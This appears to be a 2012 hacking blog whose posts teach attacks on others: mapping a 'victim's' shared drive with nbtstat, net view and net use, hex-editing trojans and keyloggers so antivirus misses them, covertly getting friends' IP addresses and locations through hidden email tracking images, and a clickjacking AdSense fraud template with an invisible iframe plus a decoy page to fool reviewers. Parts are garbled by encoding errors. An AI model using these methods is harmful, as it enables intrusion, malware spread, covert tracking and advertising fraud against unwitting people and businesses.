Recent Posts

Monday, August 27, 2012

Hacking into another persons computer



Hai...This article explains the method used for hacking into another persons computer remotely using command prompt in your network i.e network computer hacking,I have also posted another article regarding computer hacking using Rats,which has a greater sucess rate than this method and written with relavent screen shots.



Step 1 
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download


Step 2
Now click on start and then goto run and then type there "CMD" and press ok
 This is what you see:
c:\windows>
Now this is what you have to do ---->>> 
Replace 255.255.255.255 with the victims IP address.


c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table
Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx 
---------------------------------------------------------------

If you don't get the number <20>. 
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:
c:\windows>net view \\255.255.255.255 
If the output is like this:
Shared resources at \\255.255.255.255
ComputerNameGoesHere 


Sharename Type Used as Comment
CDISK Disk xxxxx xxxxx
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4 
you can replace x: by any letter you want but not the letter of your own drive.
CDISK is the name of the shared harddrive. 


Now type:c:\windows>net use x: \\255.255.255.255\CDISK
If the command is successful you are a small time hacker.
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tuesday, August 21, 2012

How to Make a Trojan,Keyloggers,Virus Undetectable by Antivirus Software-Hex Editing

click hear to get the clear version  because some time you cant read the post below because of the unwanted characters

 I've been writing a lot about keylogging on this blog. Now as you know, most of the keyloggers are detected by anti-virus softwares, so what you really want is a FUD Keylogger (Fully Undetactable). That means no anti-virus software will alrert the victim saying its a virus. There are very few FUD Keyloggers on web and the most of the time you need to buy a keylogger that will be FUD for a long time. They normally cost about 3$-20$, depending on the functions of the Builder.
Since the FUD keyloggers cost money, i decided to show you how to make them undetectable for free, using hexediting method.

Here I will try to explain how to hexedit your favorite Trojan in order to make it undetected by certain anti-virus programs. I will try to put this as simple as possible so everyone understands it.

Content:

  1. General info about hexediting .
  2. What tools you need to get started.
  3. How to hex.

General info about hexediting

If you want to make your server undetectable, you need to know how AVs work and how they detect your files, right? There are a few ways that AVs use to detect your server heuristics, sandboxing, etc., and one of them is using so called "definition files" that carry information about strings inside your server. Well, that's the way we are going again in this tutorial because hexing is pretty much useless for other methods of detection. So when AVs scan your files it searches for specific stings on specific parts in your server, and if strings match with strings in the AV database, your file is detected.
Let as say that detected strings are "XX" so we need to change that string to something else (e.g. "XY","YY") that isn't in the AV definition database so the file can not be matched with any of the AV definitions and that way the file will be undetectable. There are going to be a few tagged strings in your server - not only one, depending on what trojan you are using and how popular is. Less popular trojans tend to have less tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can change old tagged parts, and once your AV is updated, new definition files are downloaded and your once undetected server might become detected again. Also not all AVs use the same tagged parts - this way you need to hex your server against more AVs to make it fully undetected. This can be annoying because you need to download wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs tag critical parts of the server, and if that part is altered will corrupt the server. Also, heavily edited servers can become unstable, some functions might not work, or even you can corrupt your server and make it useless.
That's why you need to check your server if its still working after every single change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding parts to one half and scanning it until you find the detected string (which is slow and time consuming); use file splitters to split your server into bytes, and after that scan all split files and find out what byte is detected then alter it in original exe, or you can use an offset AV .

What tools you need to get started

  • Unpacked trojan/keylogger server. (That's your virus)
  • Hex editor > Click here---> Download
  • Av devil >  Download
  • File Splitter > Download (Optional)
  • AV-antivirus

How to hex
-Step 1.
Turn your AV real-time protection â***65533;***65533;OFFâ***65533;***65533; . Make your Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server msg will pop up
click OK, and the next msg will popup asking you to turn your AV real-time
protection back â***65533;***65533;ONâ***65533;***65533;. After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click on "Skip" and let
AV Devil finish.
After its done you will see something like this:



As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at 5476.
Also you can see where the second offset starts and ends. Thatâ***65533;***65533;s the part that the AV
is checking in this definition database. If the part in the server matches with part in
AV database your server is detected. You can hex beginning and ending offset or in
between.
Step 2.
Now when we have detected offsets, we open our server in Hex WorkShop. Type
"Ctrl+G" and this will come up:



Type the first offset in, select from â***65533;***65533;Beginning of File,â***65533;***65533; and make sure that you
selected "hex," because offsets in AV Devil are displayed in that manner. Unless you
save via AV Devil, then they are converted into a decimal. Click â***65533;***65533;Goâ***65533;***65533; and you will
be sent to that offset location. Now we need to change that â***65533;***65533;31â***65533;***65533; to something else, so
we will change it to â***65533;***65533;32â***65533;***65533;.



Select â***65533;***65533;31â***65533;***65533; right click to it and select fill.



You will see the window below. In â***65533;***65533;Fill with the following hex byteâ***65533;***65533; we are going to
fill in â***65533;***65533;32â***65533;***65533; and hit OK.



After clicking â***65533;***65533;OK,â***65533;***65533; the changed hex byte going to be shown in red.

[slika]http://img377.imageshack.us/img377/876/slika6gy9.jpg[/img]
__________________________________________________ __________________
Now repeat this for every offset that you found in AV Devil.


__________________________________________________ ___________________
Going to change it â***65533;***65533;FEâ***65533;***65533; to â***65533;***65533;EEâ***65533;***65533; and so on for all other detected offsets.



Once youâ***65533;***65533;ve completed editing all offsets, save your server and scan if itâ***65533;***65533;s UD, and
then youâ***65533;***65533;re done. If the AV still detecting it, repeat steps 1 and 2.
Hereâ***65533;***65533;s a little tip on how to change detected bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one character up/down
for each - thatâ***65533;***65533;s the best way and will minimize chances to corrupt your server. If that
doesnâ***65533;***65533;t work for some reason, you can try and change it to something completely
different, but always check your server after editing bytes. That way you can see if the
server works or if itâ***65533;***65533;s corrupted (you can keep track of what change caused the
corruption and you can try and edit that byte with some other character).
Another thing in some Trojans servers is that AV Devil canâ***65533;***65533;t find the beginning of the
first offset and will mark it with â***65533;***65533;0.â***65533;***65533; Letâ***65533;***65533;s say youâ***65533;***65533;ve hexed all other found offsets
but your server is still detected. Split the file into half and run AV Devil on the first
half. That way you will be able to find the first offset that is missing and finish your
hexing. If some tagged part is a letter, e.g. â***65533;***65533;Yâ***65533;***65533; change it to â***65533;***65533;yâ***65533;***65533; or just PlAy wItH
ThE CaPs.
Ex:



So there you have it! Now you know how to hex your server and make it undetected
from wanted AVs.
 

Monday, August 20, 2012

How to: Unlock Memory Card Passwords

How to: Unlock Memory Card Password


If one day suddenly you restore your phone , after that you find that your memory card is password protected and shit ! You don’t know the password and have some important files & data in that, what will you do ? Don’t worry, I will show you the way by which you can unlock memory card’s password. If that trick will not work then sorry you can’t recover your memory card’s password & data but yes , I will tell you the other trick by which you can format your memory card and at-least recover your memory card to reuse.
So, these are some tricks to recover your memory card’s password.

If you have a Nokia s60 1st & 2nd edition phone you can find your memory card’s forgotten password by following these steps:

  1. First of all Download  and Install FExplorer.
  2. Run FExplorer and Open the path C:\system.
  3. You will  find there a file named mmcstore , move this file to other location of your phone, rename the file mmcstore.txt
  4. Open the file in your phone or Copy that file(mmcstore.txt) to your pc and open that file in notepad.
  5. You will find your password in that file.
  6. By this way, you can unlock memory card and recover your memory card’s password.

"Gauss" Malware a Cyber-Espionage + Banking Trojan out in the wild

A new malware, “Gauss” targeting users in the Middle-East has been discovered. Initiated by the International Telecommunication Union (ITU) following the discovery of Flame, Kaspersky Lab experts have discovered this new cyber threat which is a complex, nation-state sponsored cyber-espionage toolkit designed to steal sensitive data with a specific focus on browser password, online banking account credentials, cookies, and specific configurations of infected machines.
ITU-IMPACT’s partner, Kaspersky Lab, have developed the removal tool to be used to remove this malware from infected systems. This tool, Kaspersky Virus Removal Tool Special ITU Edition,  removes Gauss, Flame, Stuxnet, Duqu and all other known malicious programs. The link contains the tool itself and a user manual. Please note that you have to launch the tool twice for the full recovery from the Gauss malware. The tool is now made available by ITU-IMPACT and Kaspersky Lab and can be download via the FTP site below:
In order for you to get this tool please download it from our site: http://cloud.impact-alliance.org/ 
Username           :country
Password            :Welcome1 
Once you click on the link, the download will start and you will get a .rar file (archived file format). This archived file contains the tool itself. However, the tool is quite intuitive and user friendly. 
You will need to:
1.    unzip the file
2.    install the application
3.    run through the scan
4.    Follow instructions if any malware is detected
5.    Check manual if you find any difficulty 
The archive is protected by a password: Rzj3Uvu5OEcg7YKm 
Attached with this email is a document “Gauss QA” which explains some of the queries you might have while trying to mitigate this threat. Please go through the details for more in-depth knowledge about this malware.

Hack I.P address of your friends computer with an easy to use service provided by SpyPig.com

Hack I.P address of your friends computer with an easy to use service provided by SpyPig.com

by The Hackers Paradise on Friday, March 18, 2011 at 10:17pm ·
1)Go to SpyPig.com

2)Enter your email address. [address which is used to notify you when your message has been read]

3)Enter your message title.[for eg. your friends name]

3)Select your tracking image.

You can select the white background picture so that your friends doesn’t know that you are tracking him.[you can also upload your own images as well but needs registration]

4)Number of notifications to receive.

Select this according to your wish.[10 recommended]

5)Click  the Activate button.Once the image is generated, you have 60 seconds to copy paste the same in your email and send the email.If you are using Firefox then click and drag the tracking image and drop it into your email. Don't use your right-mouse click to copy the image.

6)Once you have copied the image in the email,send it within 60 seconds so that you itself is not tracked.

Problem with this image tracking service is that if your friend is using Gmail,then he will have to click  “Display images below” button for your tracking code to work properly. So make sure you are sending him some sort of images or e-cards so that he needs to click that button to read your mail.

 gmail chat ip address


When your friend reads the email, you will receive a notification from spypig about the time when it is read and also your friends IP address :).This technique can be used for identifying  your Gtalk,yahoo messenger,msn messenger or any other chat messenger friends IP address so that you can know exactly where they live or if they are faking their real identity.

finding ip address of my friend

Saturday, August 18, 2012

The VERY Black Hat AdSense with Google Trends Method

The VERY Black Hat AdSense with Google Trends Method

A couple of notes before we get to the Full Effect:
  • The highlighted parts don’t work properly in WP. If you cannot figure out the template on your own then just head over HERE and get the PDF version of this blog post which will lay out the site’s .php in color coded format to help you with editing if you are new to web design.
  • Be careful! I recommend not doing more than $20-$50 a day with this method. I taught this method to one of my coaching clients and he did $30K in about 2 weeks, needless to say he got banned. The key to going dark black hat like this is to fly under the radar, don’t bring attention to yourself and don’t get greedy! Also if you use your AdSense for a lot of white hat stuff consider running with AdBrite – they pay less but at least you aren’t risking your AdSense account.
  • I thought the traffic method makes perfect sense but apparently some people are not capable of comprehending this so let me lay it out. Your Digg.com submission uses the exact trend for title/description. It then ranks in Google, your page itself does not. If the trend is low competition (no big .coms like Fox/CNN/TMZ) then your Digg.com story will be one of the top results for the trend in a few hours and people will click it and then click through to your website.

It seems that more and more often people are dropping AdSensea revenue stream do to ever decreasing ad clicks and the fact that traffic is just worth more through affiliate sales or CPA offers. With every intention of being banned from AdSense and just playing around before dropping them completely I started a VERY black hat AdSense campaign which, my to my initial surprise, is still going strong 5 months later and getting me a paid a ton!
I will not lie; this is very against AdSense ToS so you do risk being banned. All that I can say is that I have not gotten banned and I get paid. If you are a bit faint of heart or perhaps using your AdSense account for white hat things and do not want to risk it that is 100% fine just check out other programs, who do not care so much about quality for their advertisers and do NO manual checking.
These networks include:

  •   BidVertiser
  •   MSN
  •   AdBrite
  •   YSM
All of these networks pay out slightly lower, on a cost per click basis, than Google AdSense but they do still pay and with this method you will still earn big!I can also attest to the fact that my friends who use this method have never been banned from AdSense either. As I said though, use it at your own risk and perhaps consider applying to another network so a ban will not hurt your current or future AdSense prospects.
Alright, now thatyou’ve made up your mind about what pay-per-click program you’re going to use how about we go ahead and get on to the method…
Set Up
The first step for setup here is start out a brand new site. You will need hosting for this, a domain is optional as you can always use a redirect/shortening service but you will need your own hosting as you are going to be editing some .php files. You can use 000webhost.com for free hosting but it does not
look clean so I recommend moving away from it once you get paid. Since Google Trends, and our traffic technique, are both very short lived you will be spending about 5-10 minutes each day setting up a new page based around a new trend. It gets more simple next time as you have your template and only have to edit the URL forthe new picture as well as put it the dimensions for it. This can be done on hosted sites only! Blogger.com/BlogSpot.com blogs will NOT work as you need to edit a .php page to make the code for this work!

Your very first step for the day is to head over to Google.com/trends and look for a suitable Google trend for the day. An ideal trend, for this method, will need to posses one of the following attributes:
Not covered by the major media networks such as Associated Press, CNN or Fox News. These networks will be the only things that will outrank you in Google, which is going to be your traffic source. Generally speaking about 1/3 of the top 100 trends fit this criterion and you can run with them!
The Google Trend needs to be about some sort of content that people are dying to get. This works with mainly two things –videos and pictures. For this method to work you will need your visitor to click on the picture, you will see why later.

In this example I am a bit limited today because it is the 4th of July so that takes up a ton of Google Trends and is not too useable to me. However, there are always at least a few Trends out there that I can work with. Today I went with ‘versus cycling’ which holds some great qualities; it is not covered by
the big networks, itis related to TV so I can put up a clip and it even has a related Trend a little further down the list which means the possibility to add some extra traffic (this method will let you target up to 2 Google Trends per blog post)! Here is a little shot for y’all:

Gtrends The VERY BlackHat Adsense Method
Now it is time to get a little content for my new page for the day.I will head over to Google Image search and just type in ‘versus cycling’. I found a suitable image in about a minute, anything that looks like it could be a frame from a video will do just fine. Here is the image that I went with:
bike1 The VERY BlackHat Adsense Method
Now I want to make it look like a video, this is pretty darn simple! All we are going to do is to stick a play button right on top of it. You don’t even need Photo Shop to make this look good; I’m doing it in MS Paint on my laptop as a matter of fact! I have found the perfect button for you and you can get it at:
http://i869.photobucket.com/albums/ab256/bomaj4/play.jpg
Just take that image and paste it right on top of the picture that you found. My final product, for my new webpage, is this bad boy:
bike2 The VERY BlackHat Adsense Method
Nothing too fancy but since you have to do this daily I prefer to only spend about 2 minutes total to slap up this picture! From here you can upload it straight to your server for use in your new web page. You may be thinking that it is pretty black hat toget a person to click on something that isn’t what you make it out to be. Well, you’ve been warned this is a VERY black hat method and you haven’t seen anything yet! I am about to show you how to get credited for an AdSense, or other network of your choosing, click every time someone clicks on that video!
Now it is time to generate your AdSense code. The big thing here is that you do NOT want a 100% CTR. Since Google made clicks only count on the text links and not the whole ad this helped a lot. Although you could easily still get 80%+ CTR it WILL get you banned as it initiates a manual review by Google!
Because of this you want to make your Ad Unit smaller than the picture size. What is going to happen is that this will make it so that people will have toclick the correct area of the picture –your fake video – in order to get an AdSense click. This way only a percentage of people clicking on the image will also be clicking your AdSense ad unit so you have a reasonable looking CTR.

So, it is now time to take this picture and hide it over your AdSense ads. In order to do this simply use the template that is on the following page. Create a new .txt document and paste all of it in there, then I will show you what needs to be changed to make it have your current image up and your AdSense ads
behind it. Also please note AdSense now uses a new format for ads, I use copied+pasted ad units from my old site so it looks like this. If you do the newer ones just stick that code where my AdSense code shows up.

Ok then, here it goes for you:
<style>
iframe{
opacity: 0;
border: 0px none transparent;
position: absolute;
top: 0px;
left: 0px;
height: 300px;
width: 250px;
filter:alpha(opacity=0);
}
img{
position: absolute;
top: -50px;
left: 0px;
height: 475px;
width: 342px;
}
</style>
</head>
<body>
<div>
<img src=”http://YOURDOMAINN.com/YOURIMAGE.gif”/>
<script type=”text/javascript”><!–
google_ad_client = “pub-YOURPUBID”;
google_ad_width = 300;
google_ad_height = 250;
google_ad_format = “300×250_as”;
google_ad_type = “image”;
google_ad_channel = “YOURCHANNEL”;
//–></script>
<script type=”text/javascript”

src=”http://pagead2.googlesyndication.com/pagead/show_ads.js”>
</script>
<center>Watch versus cycling in this video clip.<br>Versus Cycling is some
great videos to watch!
</div>
</body>

As you can see this is designed for a 300×250 ad unit. If you use a smaller ad unit (a must do if your picture is somewhat smaller) then just also change the dimensions to the dimensions of your ad unit.The areas highlighted in green reflect the height of width of your picture, be sure to change these to reflect whatever picture you use as well.If you are using a fairly large picture and do not need a smaller ad then simply change the parts. The first thing to
change is to add the URL of the image that you created earlier (in the img src area). Next just replace the Google AdSense code area to reflect the code that you have generated in your account.

As you know AdSense displays ads based on keywords so if there is no text here you will be showing VERY low paying public service ads. You will also note that I put a <br> in between sentences. Keep it short and keep that after the first sentence or else it will get moved behind your image and look a bit fishy. If you are using a different advertiser such as AdBrite then obviously you would place the AdBrite code in place of the AdSense code at the bottom.
This is now the end of your page set up. So to cover things, we have identified a Google Trend and built a page that will get all the interested traffic clicking on ads. Now, aside from my very handy promotion trick, all that is left is to create your ‘safe’ page to keep a manual review from slamming you –just in case!
We are going to go and make a new .txt document in wordpad. This  will be extremely generic and safe, just slap in the following code:
<head>
<style>
</style>
</head>
<center><script type=”text/javascript”><!–
google_ad_client = “pub-YOURPUBID”;
google_ad_width = 300;
google_ad_height = 250;
google_ad_format = “300×250_as”;
google_ad_type = “image”;
google_ad_channel = “YOURCHANNEL”;
//–></script>
<script type=”text/javascript”

src=”http://pagead2.googlesyndication.com/pagead/show_ads.js”>
</script></center>
<br>
<center>Versus Cycling News</center><br>

A fire that destroyed Team Type 1’s rider transport van threatened to burn up the team’s lead Sunday morning in the Arizona desert at the Race Across America (RAAM). But quick action by the crew kept the eight-rider team going and Team Type 1 led by more than an hour Sunday afternoon at Time Station No. 7 in Cottonwood, Ariz., 437 miles (704 km) into the race.

The fire started beneath the mini-van that hauls the riders and pulls the trailer carrying their Orbea bicycles. It happened when the van’s hot catalytic converter came in contact with tall grass on the side of the road while the vehicle was pulled off to make a rider exchange. Fortunately, no one was hurt. But the van was permanently damaged and a large area of the pavement was scorched.

Team Type 1 General Manager Tom Schuler, who is serving as a crew member for the team during RAAM, said he was amazing by how fast riders and staff responded to the situation.   “They had to put out the fire, disconnect the trailer hitch, reconnect the trailer to another vehicle,
move the bikes around and get a new vehicle,” Schuler said. “We were really fortunate that we were able to disconnect that trailer from the frame of the burned-out vehicle and move it onto a different van.”

As a temporary stop-gap, Team Type 1 and Team Type 2 RAAM manager Dave Eldridge put his utility van into action as the rider vehicle until he was able to secure a new rental. Eldridge is the father of Joe Eldridge, who co-founded Team Type 1 with Phil Southerland in 2004.   In the wake of the fire, RAAM organizers put out a message to the more than 70 other crews following teams or individuals in the transcontinental race. It read, in part:
RAAM wish to extend their appreciation for the quick reaction of the crew to mitigate what could have been a very dangerous event. RAAM is unable to control all aspect of the Race and therefore they cannot take responsibility for unfortunate events that may occur during the Race.

Please be aware of your surroundings (especially the dry ground cover inCalifornia) and the impact you may have on them during the race. Follow the progress of Team Type 1 and Team Type 2 during RAAM by going to teamtype1.org. Both squads are providing inspiration to people affected by diabetes around the world.
Now what you will have to change is simple:
Just Google the Trend you chose and grab a short article. Copy and paste it in there and you have your ‘safe’ page ready to throw up. When you start to get a good burst of ad clicks simply throw up the safe page after you earned your goal for the day ($100? $300?) and the ‘safe’ page will replace your old one. This is dual purpose, first of all it will now greatly lower your CTR because you have the same ad up but no sneaky technique to get it clicked. Second this method will also give you a ‘safe’ page so that by the time an AdSense rep comes to manually check it, if you happened to go a bit overboard, everything will look 100% legit to them!
That’s it for the site creation. Just remember, watch it closely and throw this up once you have a comfortable amount of cash in for the day. Even if you do not hit your goal for the day still throw this up early so that you can lower your CTR and avoid suspicion.
Now all that is left to do is to get some traffic. Simply head over to Digg and submit your new site. In the title box put your first Trend keyword exactly as it appears, in this instance it will be ‘versus cycling’. In the second box put your second Trend exactly as it appears also. Although this is optional as you will often only have 1 Trend at a time that fits well. Also put a little link bait at the end of this in the description, after all you do want people to click through.
As an example my title now reads: Versus Cycling
And my description reads: Versus TV –Watch versus cycling here, great clip of today’s action!
Now just go ahead and submit it. The way that this trick works is that Digg.com is LOVED by Google, at least short term. So, since you are not competing with CNN and Fox News your Digg.com story (not the actual site but the Digg submission) will hit the top of Google in about an hour for your Trend and
remain there for 12-24 hours. This way people searching for this Trend will click on your Digg.com story and the click through the link there which will lead them to the page that you setup. You now have a TON of traffic ready to click your invisible AdSense ad!

Enjoy it and please do not get greedy and forget to throw your ‘safe’ page up. It really is some great money so be sure to do this and milk it long term instead of getting banned!

Tuesday, August 14, 2012


1)install Xchat you can download it hear...

2)install the xchat..if you dont know how to install just go to YOUTUBE and see "how to install xchat"

3)after installation is completed.. add it in to windows firewall as a trusted file..(because you will be use a seperate port to open.. so this will not allow to open it when it is not in the firewall)

4)after completing the process start the xcat

5)in top of the left side corner you can see some menu

6) in the menu go to Xchat ---> Network List

7)fill the boxes which are enables you to type in to it..

8) just click "add" button and type "evilzone" --> click someware else and click "evilzone" again and click edit...

9)if you click edit you can see "newserver/6667" edit it like this "irc.evilzone.org/6667".. and click someware else and click "irc.evilzone.org/6667" again...and click close...

10)click "evilzone" again and click "connect"

so now you are in the "irc.evilzone.org"'s IRC channel... So now lets join to our channel

11)after login to IRC and click the text box which is in the botom of the window near to yor nickname in side of the box type "/join #malware"

so now you are in the srilankans H4ck3r's IRC clan..in this clan you can discuss anything about hackings and security all are good but dont try to be a noob just do the self study first and if you didnt got the answer just post the doubst..

after you join to it admins will tell you the rules and regulatins

thank you
[LuCif3r] :)

Thursday, August 9, 2012

How To Hack Into Someone's PC Through IP

Here is a procedure of How To Hack Into Someone's PC Through IP when the victim is in your network and you know his/her IP.

Note: This video is for educational purposes only.

Software Used: Angry IP Scan

see the video demonstration below




Tuesday, August 7, 2012

useful website to learn python!!


 
hello ! friends today i am gonna tell you a good website to learn python... even a noob can understand the basics of it.

About Python

Python is a remarkably powerful dynamic programming language that is used in a wide variety of application domains. Python is often compared to Tcl, Perl, Ruby, Scheme or Java. Some of its key distinguishing features include:
  • very clear, readable syntax
  • strong introspection capabilities
  • intuitive object orientation
  • natural expression of procedural code
  • full modularity, supporting hierarchical packages
  • exception-based error handling
  • very high level dynamic data types
  • extensive standard libraries and third party modules for virtually every task
  • extensions and modules easily written in C, C++ (or Java for Jython, or .NET languages for IronPython)
  • embeddable within applications as a scripting interface
click hear to the site!!